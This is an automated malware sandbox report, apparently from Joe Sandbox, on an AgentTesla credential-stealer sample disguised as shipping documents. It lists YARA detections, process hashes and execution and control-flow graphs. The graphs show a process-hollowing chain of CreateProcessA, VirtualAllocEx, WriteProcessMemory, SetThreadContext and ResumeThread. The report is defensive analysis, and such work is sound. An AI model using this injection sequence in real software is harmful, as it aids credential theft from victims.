                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1875942602.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:21:40:15
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                      Imagebase:0x7e0000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:21:40:16
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                      Imagebase:0x20000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:21:40:16
                      Start date:03/07/2024
                      Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                      Imagebase:0x740000
                      File size:757'248 bytes
                      MD5 hash:1154CD3205E7E1226B03B1EE15278E0A
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4099572148.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4099572148.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:9.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:288
                        Total number of Limit Nodes:10
                        execution_graph 38759 fcd01c 38760 fcd034 38759->38760 38761 fcd08e 38760->38761 38764 5352818 38760->38764 38769 5352808 38760->38769 38765 5352845 38764->38765 38766 5352877 38765->38766 38774 5352990 38765->38774 38779 53529a0 38765->38779 38770 5352815 38769->38770 38771 5352877 38770->38771 38772 53529a0 2 API calls 38770->38772 38773 5352990 2 API calls 38770->38773 38772->38771 38773->38771 38776 53529b4 38774->38776 38775 5352a40 38775->38766 38784 5352a58 38776->38784 38787 5352a48 38776->38787 38780 53529b4 38779->38780 38782 5352a58 2 API calls 38780->38782 38783 5352a48 2 API calls 38780->38783 38781 5352a40 38781->38766 38782->38781 38783->38781 38785 5352a69 38784->38785 38790 535401b 38784->38790 38785->38775 38788 5352a69 38787->38788 38789 535401b 2 API calls 38787->38789 38788->38775 38789->38788 38794 5354030 38790->38794 38798 5354040 38790->38798 38791 535402a 38791->38785 38795 5354040 38794->38795 38796 53540da CallWindowProcW 38795->38796 38797 5354089 38795->38797 38796->38797 38797->38791 38799 5354082 38798->38799 38801 5354089 38798->38801 38800 53540da CallWindowProcW 38799->38800 38799->38801 38800->38801 38801->38791 38462 136acb0 38466 136ad97 38462->38466 38474 136ada8 38462->38474 38463 136acbf 38467 136adb9 38466->38467 38468 136addc 38466->38468 38467->38468 38482 136b040 38467->38482 38486 136b031 38467->38486 38468->38463 38469 136add4 38469->38468 38470 136afe0 GetModuleHandleW 38469->38470 38471 136b00d 38470->38471 38471->38463 38475 136adb9 38474->38475 38476 136addc 38474->38476 38475->38476 38480 136b040 LoadLibraryExW 38475->38480 38481 136b031 LoadLibraryExW 38475->38481 38476->38463 38477 136afe0 GetModuleHandleW 38479 136b00d 38477->38479 38478 136add4 38478->38476 38478->38477 38479->38463 38480->38478 38481->38478 38483 136b054 38482->38483 38485 136b079 38483->38485 38490 136a130 38483->38490 38485->38469 38487 136b040 38486->38487 38488 136b079 38487->38488 38489 136a130 LoadLibraryExW 38487->38489 38488->38469 38489->38488 38491 136b220 LoadLibraryExW 38490->38491 38493 136b299 38491->38493 38493->38485 38802 136d040 38803 136d086 38802->38803 38807 136d628 38803->38807 38810 136d618 38803->38810 38804 136d173 38813 136d27c 38807->38813 38811 136d656 38810->38811 38812 136d27c DuplicateHandle 38810->38812 38811->38804 38812->38811 38814 136d690 DuplicateHandle 38813->38814 38815 136d656 38814->38815 38815->38804 38501 4dd9b84 38502 4dd9b5e 38501->38502 38503 4dd9b6e 38501->38503 38508 4dda586 38502->38508 38529 4dda520 38502->38529 38549 4dda4d0 38502->38549 38570 4dda511 38502->38570 38509 4dda514 38508->38509 38510 4dda589 38508->38510 38590 4ddaa42 38509->38590 38598 4ddae21 38509->38598 38603 4ddaa66 38509->38603 38611 4ddad26 38509->38611 38619 4ddaf67 38509->38619 38628 4ddaa88 38509->38628 38640 4ddaba9 38509->38640 38652 4ddaecf 38509->38652 38660 4dda9ec 38509->38660 38664 4ddb06c 38509->38664 38669 4ddac73 38509->38669 38679 4ddac30 38509->38679 38683 4ddae96 38509->38683 38687 4ddab15 38509->38687 38691 4ddb1d8 38509->38691 38703 4ddadbf 38509->38703 38707 4ddae5d 38509->38707 38510->38503 38511 4dda542 38511->38503 38530 4dda53a 38529->38530 38532 4ddae5d 2 API calls 38530->38532 38533 4ddadbf 2 API calls 38530->38533 38534 4ddb1d8 4 API calls 38530->38534 38535 4ddab15 2 API calls 38530->38535 38536 4ddae96 2 API calls 38530->38536 38537 4ddac30 2 API calls 38530->38537 38538 4ddac73 2 API calls 38530->38538 38539 4ddb06c 2 API calls 38530->38539 38540 4dda9ec 2 API calls 38530->38540 38541 4ddaecf 2 API calls 38530->38541 38542 4ddaba9 4 API calls 38530->38542 38543 4ddaa88 4 API calls 38530->38543 38544 4ddaf67 2 API calls 38530->38544 38545 4ddad26 2 API calls 38530->38545 38546 4ddaa66 2 API calls 38530->38546 38547 4ddae21 2 API calls 38530->38547 38548 4ddaa42 2 API calls 38530->38548 38531 4dda542 38531->38503 38532->38531 38533->38531 38534->38531 38535->38531 38536->38531 38537->38531 38538->38531 38539->38531 38540->38531 38541->38531 38542->38531 38543->38531 38544->38531 38545->38531 38546->38531 38547->38531 38548->38531 38550 4dda4f5 38549->38550 38551 4dda52c 38549->38551 38550->38503 38553 4ddae5d 2 API calls 38551->38553 38554 4ddadbf 2 API calls 38551->38554 38555 4ddb1d8 4 API calls 38551->38555 38556 4ddab15 2 API calls 38551->38556 38557 4ddae96 2 API calls 38551->38557 38558 4ddac30 2 API calls 38551->38558 38559 4ddac73 2 API calls 38551->38559 38560 4ddb06c 2 API calls 38551->38560 38561 4dda9ec 2 API calls 38551->38561 38562 4ddaecf 2 API calls 38551->38562 38563 4ddaba9 4 API calls 38551->38563 38564 4ddaa88 4 API calls 38551->38564 38565 4ddaf67 2 API calls 38551->38565 38566 4ddad26 2 API calls 38551->38566 38567 4ddaa66 2 API calls 38551->38567 38568 4ddae21 2 API calls 38551->38568 38569 4ddaa42 2 API calls 38551->38569 38552 4dda542 38552->38503 38553->38552 38554->38552 38555->38552 38556->38552 38557->38552 38558->38552 38559->38552 38560->38552 38561->38552 38562->38552 38563->38552 38564->38552 38565->38552 38566->38552 38567->38552 38568->38552 38569->38552 38571 4dda514 38570->38571 38573 4ddae5d 2 API calls 38571->38573 38574 4ddadbf 2 API calls 38571->38574 38575 4ddb1d8 4 API calls 38571->38575 38576 4ddab15 2 API calls 38571->38576 38577 4ddae96 2 API calls 38571->38577 38578 4ddac30 2 API calls 38571->38578 38579 4ddac73 2 API calls 38571->38579 38580 4ddb06c 2 API calls 38571->38580 38581 4dda9ec 2 API calls 38571->38581 38582 4ddaecf 2 API calls 38571->38582 38583 4ddaba9 4 API calls 38571->38583 38584 4ddaa88 4 API calls 38571->38584 38585 4ddaf67 2 API calls 38571->38585 38586 4ddad26 2 API calls 38571->38586 38587 4ddaa66 2 API calls 38571->38587 38588 4ddae21 2 API calls 38571->38588 38589 4ddaa42 2 API calls 38571->38589 38572 4dda542 38572->38503 38573->38572 38574->38572 38575->38572 38576->38572 38577->38572 38578->38572 38579->38572 38580->38572 38581->38572 38582->38572 38583->38572 38584->38572 38585->38572 38586->38572 38587->38572 38588->38572 38589->38572 38593 4ddaa4e 38590->38593 38591 4ddacee 38594 4dd9478 WriteProcessMemory 38591->38594 38595 4dd9480 WriteProcessMemory 38591->38595 38592 4ddb1b9 38593->38591 38711 4dd9478 38593->38711 38715 4dd9480 38593->38715 38594->38592 38595->38592 38599 4ddb297 38598->38599 38719 4dd9568 38599->38719 38723 4dd9570 38599->38723 38600 4ddb2b9 38604 4ddaa4e 38603->38604 38605 4ddacee 38604->38605 38609 4dd9478 WriteProcessMemory 38604->38609 38610 4dd9480 WriteProcessMemory 38604->38610 38607 4dd9478 WriteProcessMemory 38605->38607 38608 4dd9480 WriteProcessMemory 38605->38608 38606 4ddb1b9 38607->38606 38608->38606 38609->38604 38610->38604 38614 4ddaa4e 38611->38614 38612 4ddacee 38615 4dd9478 WriteProcessMemory 38612->38615 38616 4dd9480 WriteProcessMemory 38612->38616 38613 4ddb1b9 38614->38612 38617 4dd9478 WriteProcessMemory 38614->38617 38618 4dd9480 WriteProcessMemory 38614->38618 38615->38613 38616->38613 38617->38614 38618->38614 38622 4ddaa4e 38619->38622 38620 4ddb291 38620->38511 38621 4ddacee 38626 4dd9478 WriteProcessMemory 38621->38626 38627 4dd9480 WriteProcessMemory 38621->38627 38622->38620 38622->38621 38624 4dd9478 WriteProcessMemory 38622->38624 38625 4dd9480 WriteProcessMemory 38622->38625 38623 4ddb1b9 38624->38622 38625->38622 38626->38623 38627->38623 38631 4ddaa95 38628->38631 38629 4ddacee 38636 4dd9478 WriteProcessMemory 38629->38636 38637 4dd9480 WriteProcessMemory 38629->38637 38630 4ddb1b9 38631->38629 38633 4ddaa4e 38631->38633 38727 4dd93c0 38631->38727 38731 4dd93b8 38631->38731 38632 4ddb3ff 38632->38511 38633->38629 38633->38632 38638 4dd9478 WriteProcessMemory 38633->38638 38639 4dd9480 WriteProcessMemory 38633->38639 38636->38630 38637->38630 38638->38633 38639->38633 38641 4ddaaad 38640->38641 38642 4ddacee 38641->38642 38644 4ddaa4e 38641->38644 38650 4dd93b8 VirtualAllocEx 38641->38650 38651 4dd93c0 VirtualAllocEx 38641->38651 38648 4dd9478 WriteProcessMemory 38642->38648 38649 4dd9480 WriteProcessMemory 38642->38649 38643 4ddb1b9 38643->38643 38644->38642 38645 4ddb3ff 38644->38645 38646 4dd9478 WriteProcessMemory 38644->38646 38647 4dd9480 WriteProcessMemory 38644->38647 38645->38511 38646->38644 38647->38644 38648->38643 38649->38643 38650->38644 38651->38644 38654 4ddaa4e 38652->38654 38653 4ddacee 38656 4dd9478 WriteProcessMemory 38653->38656 38657 4dd9480 WriteProcessMemory 38653->38657 38654->38653 38658 4dd9478 WriteProcessMemory 38654->38658 38659 4dd9480 WriteProcessMemory 38654->38659 38655 4ddb1b9 38656->38655 38657->38655 38658->38654 38659->38654 38735 4dd96fc 38660->38735 38739 4dd9708 38660->38739 38666 4ddadd6 38664->38666 38665 4ddb080 38666->38665 38743 4dd8df8 38666->38743 38747 4dd8e00 38666->38747 38673 4dd9478 WriteProcessMemory 38669->38673 38674 4dd9480 WriteProcessMemory 38669->38674 38670 4ddaa4e 38671 4ddace8 38670->38671 38677 4dd9478 WriteProcessMemory 38670->38677 38678 4dd9480 WriteProcessMemory 38670->38678 38675 4dd9478 WriteProcessMemory 38671->38675 38676 4dd9480 WriteProcessMemory 38671->38676 38672 4ddb1b9 38673->38670 38674->38670 38675->38672 38676->38672 38677->38670 38678->38670 38751 4dd8ea8 38679->38751 38755 4dd8eb0 38679->38755 38680 4ddac53 38680->38511 38685 4dd8ea8 Wow64SetThreadContext 38683->38685 38686 4dd8eb0 Wow64SetThreadContext 38683->38686 38684 4ddaeb0 38685->38684 38686->38684 38688 4ddab1b 38687->38688 38689 4dd8df8 ResumeThread 38688->38689 38690 4dd8e00 ResumeThread 38688->38690 38689->38688 38690->38688 38692 4ddaa4e 38691->38692 38695 4ddaaad 38691->38695 38693 4ddb3ff 38692->38693 38696 4ddacee 38692->38696 38701 4dd9478 WriteProcessMemory 38692->38701 38702 4dd9480 WriteProcessMemory 38692->38702 38693->38511 38694 4ddb1b9 38695->38692 38695->38696 38699 4dd93b8 VirtualAllocEx 38695->38699 38700 4dd93c0 VirtualAllocEx 38695->38700 38697 4dd9478 WriteProcessMemory 38696->38697 38698 4dd9480 WriteProcessMemory 38696->38698 38697->38694 38698->38694 38699->38692 38700->38692 38701->38692 38702->38692 38704 4ddadc5 38703->38704 38705 4dd8df8 ResumeThread 38704->38705 38706 4dd8e00 ResumeThread 38704->38706 38705->38704 38706->38704 38708 4ddadd7 38707->38708 38709 4dd8df8 ResumeThread 38708->38709 38710 4dd8e00 ResumeThread 38708->38710 38709->38708 38710->38708 38712 4dd94c8 WriteProcessMemory 38711->38712 38714 4dd951f 38712->38714 38714->38593 38716 4dd94c8 WriteProcessMemory 38715->38716 38718 4dd951f 38716->38718 38718->38593 38720 4dd95bb ReadProcessMemory 38719->38720 38722 4dd95ff 38720->38722 38722->38600 38724 4dd95bb ReadProcessMemory 38723->38724 38726 4dd95ff 38724->38726 38726->38600 38728 4dd9400 VirtualAllocEx 38727->38728 38730 4dd943d 38728->38730 38730->38633 38732 4dd9400 VirtualAllocEx 38731->38732 38734 4dd943d 38732->38734 38734->38633 38736 4dd9791 CreateProcessA 38735->38736 38738 4dd9953 38736->38738 38740 4dd9791 CreateProcessA 38739->38740 38742 4dd9953 38740->38742 38744 4dd8e40 ResumeThread 38743->38744 38746 4dd8e71 38744->38746 38746->38666 38748 4dd8e40 ResumeThread 38747->38748 38750 4dd8e71 38748->38750 38750->38666 38752 4dd8ef5 Wow64SetThreadContext 38751->38752 38754 4dd8f3d 38752->38754 38754->38680 38756 4dd8ef5 Wow64SetThreadContext 38755->38756 38758 4dd8f3d 38756->38758 38758->38680 38494 4ddb750 38495 4ddb8db 38494->38495 38496 4ddb776 38494->38496 38496->38495 38498 4dd7cc8 38496->38498 38499 4ddb9d0 PostMessageW 38498->38499 38500 4ddba3c 38499->38500 38500->38496
                        Memory Dump Source
                        • Source File: 00000000.00000002.1646324139.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5350000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ebbbcf15a5ca6e09c5b3d5e2750daf746caa60718667f15676aa0a838a3142c6
                        • Instruction ID: d78b42fb50ae9d671c14dd015a4800cb690dbbc89a8bdc2bce32656d7a053716
                        • Opcode Fuzzy Hash: ebbbcf15a5ca6e09c5b3d5e2750daf746caa60718667f15676aa0a838a3142c6
                        • Instruction Fuzzy Hash: F2A2A534A51219CFDB14DF24C898ED9B7B1EF8A304F5191E9D8096B365DB32AE85CF80

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 394 4dd96fc-4dd979d 396 4dd979f-4dd97a9 394->396 397 4dd97d6-4dd97f6 394->397 396->397 398 4dd97ab-4dd97ad 396->398 402 4dd982f-4dd985e 397->402 403 4dd97f8-4dd9802 397->403 400 4dd97af-4dd97b9 398->400 401 4dd97d0-4dd97d3 398->401 404 4dd97bd-4dd97cc 400->404 405 4dd97bb 400->405 401->397 413 4dd9897-4dd9951 CreateProcessA 402->413 414 4dd9860-4dd986a 402->414 403->402 406 4dd9804-4dd9806 403->406 404->404 407 4dd97ce 404->407 405->404 408 4dd9829-4dd982c 406->408 409 4dd9808-4dd9812 406->409 407->401 408->402 411 4dd9814 409->411 412 4dd9816-4dd9825 409->412 411->412 412->412 415 4dd9827 412->415 425 4dd995a-4dd99e0 413->425 426 4dd9953-4dd9959 413->426 414->413 416 4dd986c-4dd986e 414->416 415->408 417 4dd9891-4dd9894 416->417 418 4dd9870-4dd987a 416->418 417->413 420 4dd987c 418->420 421 4dd987e-4dd988d 418->421 420->421 421->421 422 4dd988f 421->422 422->417 436 4dd99f0-4dd99f4 425->436 437 4dd99e2-4dd99e6 425->437 426->425 439 4dd9a04-4dd9a08 436->439 440 4dd99f6-4dd99fa 436->440 437->436 438 4dd99e8 437->438 438->436 442 4dd9a18-4dd9a1c 439->442 443 4dd9a0a-4dd9a0e 439->443 440->439 441 4dd99fc 440->441 441->439 445 4dd9a2e-4dd9a35 442->445 446 4dd9a1e-4dd9a24 442->446 443->442 444 4dd9a10 443->444 444->442 447 4dd9a4c 445->447 448 4dd9a37-4dd9a46 445->448 446->445 450 4dd9a4d 447->450 448->447 450->450
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DD993E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: w&
                        • API String ID: 963392458-3348004922
                        • Opcode ID: 4bbeedef6fdbfe9b745f8367feff1f3cf72c12ea76fb7b8c24c244fd4f223a66
                        • Instruction ID: 5e26ea8d9b2dce0147665389f4408f5dfb18ccdd70b6a5c62fa235bd562b404e
                        • Opcode Fuzzy Hash: 4bbeedef6fdbfe9b745f8367feff1f3cf72c12ea76fb7b8c24c244fd4f223a66
                        • Instruction Fuzzy Hash: A1916BB1D00219DFEB10CF68C8517EDBBB2BF48314F1485A9E849A7244DB75A985CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 451 4dd9708-4dd979d 453 4dd979f-4dd97a9 451->453 454 4dd97d6-4dd97f6 451->454 453->454 455 4dd97ab-4dd97ad 453->455 459 4dd982f-4dd985e 454->459 460 4dd97f8-4dd9802 454->460 457 4dd97af-4dd97b9 455->457 458 4dd97d0-4dd97d3 455->458 461 4dd97bd-4dd97cc 457->461 462 4dd97bb 457->462 458->454 470 4dd9897-4dd9951 CreateProcessA 459->470 471 4dd9860-4dd986a 459->471 460->459 463 4dd9804-4dd9806 460->463 461->461 464 4dd97ce 461->464 462->461 465 4dd9829-4dd982c 463->465 466 4dd9808-4dd9812 463->466 464->458 465->459 468 4dd9814 466->468 469 4dd9816-4dd9825 466->469 468->469 469->469 472 4dd9827 469->472 482 4dd995a-4dd99e0 470->482 483 4dd9953-4dd9959 470->483 471->470 473 4dd986c-4dd986e 471->473 472->465 474 4dd9891-4dd9894 473->474 475 4dd9870-4dd987a 473->475 474->470 477 4dd987c 475->477 478 4dd987e-4dd988d 475->478 477->478 478->478 479 4dd988f 478->479 479->474 493 4dd99f0-4dd99f4 482->493 494 4dd99e2-4dd99e6 482->494 483->482 496 4dd9a04-4dd9a08 493->496 497 4dd99f6-4dd99fa 493->497 494->493 495 4dd99e8 494->495 495->493 499 4dd9a18-4dd9a1c 496->499 500 4dd9a0a-4dd9a0e 496->500 497->496 498 4dd99fc 497->498 498->496 502 4dd9a2e-4dd9a35 499->502 503 4dd9a1e-4dd9a24 499->503 500->499 501 4dd9a10 500->501 501->499 504 4dd9a4c 502->504 505 4dd9a37-4dd9a46 502->505 503->502 507 4dd9a4d 504->507 505->504 507->507
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DD993E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID: w&
                        • API String ID: 963392458-3348004922
                        • Opcode ID: 6b695aa97a054e96c47aad46dc7c32d64057788703d498ffb2ac3597cd1a2ad8
                        • Instruction ID: 38706049438eebb085a0404ef9840c336d608c7702eb624806316605ac507cbc
                        • Opcode Fuzzy Hash: 6b695aa97a054e96c47aad46dc7c32d64057788703d498ffb2ac3597cd1a2ad8
                        • Instruction Fuzzy Hash: 9A916CB1D00219DFEF10CF68C850BEEBBB2BF48314F1485A9E849A7254DB75A985CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 644 136ada8-136adb7 645 136ade3-136ade7 644->645 646 136adb9-136adc6 call 136a0cc 644->646 648 136adfb-136ae3c 645->648 649 136ade9-136adf3 645->649 653 136addc 646->653 654 136adc8 646->654 655 136ae3e-136ae46 648->655 656 136ae49-136ae57 648->656 649->648 653->645 701 136adce call 136b040 654->701 702 136adce call 136b031 654->702 655->656 657 136ae7b-136ae7d 656->657 658 136ae59-136ae5e 656->658 663 136ae80-136ae87 657->663 660 136ae60-136ae67 call 136a0d8 658->660 661 136ae69 658->661 659 136add4-136add6 659->653 662 136af18-136af94 659->662 667 136ae6b-136ae79 660->667 661->667 694 136af96-136afbe 662->694 695 136afc0-136afd8 662->695 664 136ae94-136ae9b 663->664 665 136ae89-136ae91 663->665 668 136ae9d-136aea5 664->668 669 136aea8-136aeaa call 136a0e8 664->669 665->664 667->663 668->669 673 136aeaf-136aeb1 669->673 675 136aeb3-136aebb 673->675 676 136aebe-136aec3 673->676 675->676 677 136aec5-136aecc 676->677 678 136aee1-136aeee 676->678 677->678 680 136aece-136aede call 136a0f8 call 136a108 677->680 684 136aef0-136af0e 678->684 685 136af11-136af17 678->685 680->678 684->685 694->695 696 136afe0-136b00b GetModuleHandleW 695->696 697 136afda-136afdd 695->697 698 136b014-136b028 696->698 699 136b00d-136b013 696->699 697->696 699->698 701->659 702->659
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0136AFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c89092d747d0c3fa4a76f4342bec79881ae8741913c36fd3dcd09185a08cecac
                        • Instruction ID: 66a0af300397b72a68b543d9e2d03e0ca2aaf228e059bae797c21578c7a5c234
                        • Opcode Fuzzy Hash: c89092d747d0c3fa4a76f4342bec79881ae8741913c36fd3dcd09185a08cecac
                        • Instruction Fuzzy Hash: AD817770A00B058FDB24DF29D44579ABBF5FF48308F008A2DD08AEBA55D775E84ACB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 703 136590d-1365913 704 1365918-13659d9 CreateActCtxA 703->704 706 13659e2-1365a3c 704->706 707 13659db-13659e1 704->707 714 1365a3e-1365a41 706->714 715 1365a4b-1365a4f 706->715 707->706 714->715 716 1365a60 715->716 717 1365a51-1365a5d 715->717 718 1365a61 716->718 717->716 718->718
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 013659C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b47ffb0d481cec0c2c07ee6ace5244282d93182b5d258e182f6603763269746b
                        • Instruction ID: b2684d380b9fa2956374fb863e74d8b2bf30b6a82a047b784aa68e0a8483bbad
                        • Opcode Fuzzy Hash: b47ffb0d481cec0c2c07ee6ace5244282d93182b5d258e182f6603763269746b
                        • Instruction Fuzzy Hash: 9441D2B0C0071DCBDB24CFA9C884BCDBBB9BF49344F24806AD448AB255DB756945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 720 13644c4-13659d9 CreateActCtxA 723 13659e2-1365a3c 720->723 724 13659db-13659e1 720->724 731 1365a3e-1365a41 723->731 732 1365a4b-1365a4f 723->732 724->723 731->732 733 1365a60 732->733 734 1365a51-1365a5d 732->734 735 1365a61 733->735 734->733 735->735
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 013659C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5f7405e33823134074916ec52f5ee780dfba1aa7073f3fdd03a5a45a586553c6
                        • Instruction ID: 4b9e29c4f99485c23dc7f49a77de033f517004a2145b505aa6341e34136f211a
                        • Opcode Fuzzy Hash: 5f7405e33823134074916ec52f5ee780dfba1aa7073f3fdd03a5a45a586553c6
                        • Instruction Fuzzy Hash: 9041C2B0C0071DCBDB24DFA9C884B9DBBF9BF49304F2480AAD408AB255DB756945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 737 5354040-535407c 738 5354082-5354087 737->738 739 535412c-535414c 737->739 740 5354089-53540c0 738->740 741 53540da-5354112 CallWindowProcW 738->741 746 535414f-535415c 739->746 747 53540c2-53540c8 740->747 748 53540c9-53540d8 740->748 742 5354114-535411a 741->742 743 535411b-535412a 741->743 742->743 743->746 747->748 748->746
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05354101
                        Memory Dump Source
                        • Source File: 00000000.00000002.1646324139.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5350000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 3c52b1334a074f5e38a24e5f53bb35e537e0129d14d52072a2bc25d8a616a8db
                        • Instruction ID: ea6fb43778c3a5308c2ed5db09f8af564c92c4f95337c49f9ca5daa23daebe16
                        • Opcode Fuzzy Hash: 3c52b1334a074f5e38a24e5f53bb35e537e0129d14d52072a2bc25d8a616a8db
                        • Instruction Fuzzy Hash: 4B41F6B4A003098FCB14CF99C448AAAFBF5FF88324F24C459D519AB361D775A981CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 751 4dd7c43-4ddba3a PostMessageW 759 4ddba3c-4ddba42 751->759 760 4ddba43-4ddba57 751->760 759->760
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DDBA2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 4d3bf8110466093dd228767dd18fb951a120f4afe6938c182b2c22a635716105
                        • Instruction ID: d798d140bddc5b54b2014ca86aa9a52d38f834522daae85ba18818c4209f7d68
                        • Opcode Fuzzy Hash: 4d3bf8110466093dd228767dd18fb951a120f4afe6938c182b2c22a635716105
                        • Instruction Fuzzy Hash: 4D31D1718083988FD701EFACD8A47CEBFB4EF45314F0540ABD084AB252C274A484CBB6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 762 4dd7cd8-4dd7d08 766 4dd7d0a-4dd7d0b 762->766 767 4dd7c93-4dd7ccf 762->767 768 4ddb9d0-4ddba3a PostMessageW 766->768 767->768 769 4ddba3c-4ddba42 768->769 770 4ddba43-4ddba57 768->770 769->770
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DDBA2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e3be6a105fcc51010c4f428ceec150fe4a281ecff4e5e21bd2ca510d27cdb0b1
                        • Instruction ID: 6e87afdf4aeecb1334a311478dd764d54e0cea9300a9c5e5da3404817a013393
